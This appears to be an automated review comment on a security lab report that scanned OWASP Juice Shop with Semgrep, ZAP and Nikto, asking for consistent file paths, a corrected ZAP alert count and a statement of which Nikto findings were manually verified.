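Review bot: the file paths in the "Five Most Critical Semgrep Findings" table (`/src/routes/search.ts:23`, `/src/lib/insecurity.ts:43`) do not match the paths used in the prose (`routes/search.ts`, `lib/insecurity.ts`) or the stated clone location `labs/lab5/semgrep/juice-shop`; use one convention, the path relative to the repository root, so a reader can open the cited line. Two further points. First, the ZAP rows in the comparison matrix and the findings summary count "ZAP is Out of Date" (pluginid 10116 in the committed report) among the "13 alert rules", which inflates an application-finding count with a tool-health item; exclude it or footnote it. Second, "Nikto: 84 reported items" is given without saying how many were verified: of the three paths named, `/ftp/` is corroborated by the committed ZAP report (e.g. `/ftp/acquisitions.md`, `/ftp/legal.md`, and 403s on `/ftp/eastere.gg`), but `/public/` and `/.htpasswd` appear nowhere else in the evidence, so state which were confirmed with a manual request and which remain unverified, especially as the ZAP "Modern Web Application" alert indicates a script-driven front end whose responses can mislead path-guessing checks.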